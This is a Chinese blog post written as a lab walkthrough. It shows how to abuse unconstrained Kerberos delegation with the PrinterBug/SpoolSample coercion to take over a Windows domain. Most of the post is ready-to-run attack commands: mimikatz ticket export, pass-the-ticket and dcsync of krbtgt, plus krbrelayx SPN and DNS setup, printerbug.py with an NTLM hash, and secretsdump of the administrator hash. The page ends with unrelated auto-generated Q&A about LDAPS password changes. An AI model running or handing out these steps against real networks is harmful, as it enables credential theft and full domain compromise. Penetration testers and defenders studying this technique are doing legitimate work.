非约束委派账户配合printerbug域内提权

环境搭建

主机机器名ip用户版本
域控ad.test.com192.168.164.147administratorwin2012r2
域内机器user.test.com192.168.164.129user1win2008r2

配置非约束委派

在这里插入图片描述

漏洞复现

本地

https://github.com/leechristensen/SpoolSample/.
https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718

因为这里环境是win2008 默认不支持.net4.0,所以安装一个…实际环境需要参考下面的远程方法
fixed

SpoolSample.exe ad user
# 前面为域控,后面为机器

抓取票据

mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"

在这里插入图片描述
可以看到在最下面已经抓到域控机器的tgt票据
导入票据

mimikatz "privilege::debug" "kerberos::ptt [0;103619]-2-0-60a10000-AD$@krbtgt-TEST.COM.kirbi" "exit"

导出hash

mimikatz "lsadump::dcsync /domain:test.com /user:krbtgt /csv" "exit"

在这里插入图片描述

远程

这种情况需要获得一个具有非约束委派账号(可以添加spn)并且有一个linux机器
工具地址

https://github.com/dirkjanm/krbrelayx

配置账号权限,可以添加spn

创建非约束委派账户
首先给这个用户配置spn

setspn.exe -U -A VNC/comp.test.com user1

之后配置账户非约束委派
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

第一种情况

有一个linux机器,但是无windows机器,这时候的密码一般是爆破或者社工来的

添加spn
python3 addspn.py -u "test.com\user1" -p "Uu1234." -s host/linux.test.com 192.168.164.147

坑点,这里要用host
在这里插入图片描述

添加dns记录
python3 dnstool.py -u "test.com\user1" -p Uu1234. -r linux.test.com  -a add -d 192.168.164.128 192.168.164.147
#192.168.164.128为linux主机ip后面为域控ip

在这里插入图片描述

开启中继
python3 krbrelayx.py -p "Uu1234." -s TEST.COMuser1

在这里插入图片描述

触发回连
python3 printerbug.py test.com/user1@192.168.164.147 -hashes :b7f04fcd31abe483e8ec8c6eea51422d linux.test.com

在这里插入图片描述

利用tgt

在/etc/hosts文件中添加如下两行记录用于解析域名

192.168.164.147 ad.test.com
192.168.164.147 test.com

使用票据导出hash

export KRB5CCNAME=xxx.ccache
python3 /root/impacket/examples/secretsdump.py -k ad.test.com -just-dc-user administrator

第二种情况

有一个linux,也有windows机器,

python3 printerbug.py test.com/user1@192.168.164.147 -hashes :b7f04fcd31abe483e8ec8c6eea51422d user.test.com
#user.test.com是回连的地址

抓取票据

mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"

在这里插入图片描述
剩下的票据利用就和前面一样了

参考文章

https://docs.microsoft.com/zh-cn/dotnet/api/system.func-3?view=netframework-3.5
https://mp.weixin.qq.com/s/aM2k01N6_H5FOxoEyj39LA
https://blog.csdn.net/a3320315/article/details/106511098

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: 当ldaps客户端使用委派账户修改密码时,如果出现密码被拒绝的提示,可能是由于以下几个原因: 1. 错误的凭据:首先,我们要确保在委派账户中输入的密码是正确的。密码可能因为键入错误或者被更改而导致被拒绝。 2. 访问权限限制:另一个可能的原因是委派账户没有足够的访问权限来修改密码。在LDAP服务器上,有可能设置了访问控制列表(ACL)或者权限策略,限制了委派账户对用户密码的修改操作。需要检查并确保委派账户具有足够的权限来执行这个操作。 3. 无法连接到LDAP服务器:第三个可能的原因是ldaps客户端无法正确连接到LDAP服务器。这可能是由于网络问题、服务器故障或者客户端配置错误引起的。需要确认网络连接是否畅通,并通过正确的主机名、端口号和协议(如LDAPS)来配置客户端。 4. 密码策略限制:最后一个可能的原因是LDAP服务器的密码策略限制。密码策略可能要求密码满足一定的复杂性要求,例如长度、包含字母、数字和特殊字符等。如果委派账户设置的新密码不符合这些要求,服务器可能会拒绝修改密码请求。 在解决这个问题时,我们可以按照以下步骤进行操作: 1. 验证委派账户的凭据是否正确。 2. 检查委派账户的访问权限设置,确保具有足够的权限来修改密码。 3. 检查ldaps客户端的网络配置,确保可以正确连接到LDAP服务器。 4. 确认密码策略要求,并根据需要修改委派账户的新密码。 如果问题仍然存在,可以进一步检查服务器日志以获取更详细的错误信息,或者联系LDAP服务器管理员获取帮助。 ### 回答2: 当ldaps客户端使用委派账户修改密码时,如果提示密码被拒绝,可能有以下几个原因: 1. 权限不足:委派账户可能没有足够的权限来修改密码。在Active Directory(AD)环境中,修改密码需要特定的权限,例如"Reset Password"或"Change Password"权限。需要确保委派账户具有足够的权限来执行密码修改操作。 2. 密码策略限制:AD中的密码策略可能会对密码修改提出一些限制。例如,密码长度、复杂度、历史纪录等要求。如果委派账户的密码不符合这些要求,密码修改将被拒绝。需要确保委派账户的密码满足AD的密码策略要求。 3. 连接问题:ldaps客户端与LDAP服务器之间的连接可能存在问题。例如,权限设置、证书配置、网络连接等方面的问题都可能导致密码修改被拒绝。需要确保ldaps客户端与LDAP服务器之间的连接正常,权限和证书配置正确。 4. 密码已过期:如果委派账户的密码已经过期,密码修改将被拒绝。需要确保委派账户的密码处于有效状态。 针对以上问题,可以通过以下方法来解决: 1. 验证委派账户的权限,并确保具有足够的权限来修改密码。 2. 检查密码策略,并确保委派账户的密码符合AD的密码策略要求。 3. 检查ldaps客户端和LDAP服务器之间的连接设置,并确保连接正常。 4. 如果委派账户的密码已过期,尝试修改密码后再进行密码修改操作。 5. 如果问题仍然存在,可以尝试重新配置ldaps客户端和LDAP服务器之间的连接,并检查所有相关的配置项。 综上所述,当ldaps客户端使用委派账户修改密码时,如果提示密码被拒绝,原因可能是权限不足、密码策略限制、连接问题或密码已过期。需要仔细检查并解决相应的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值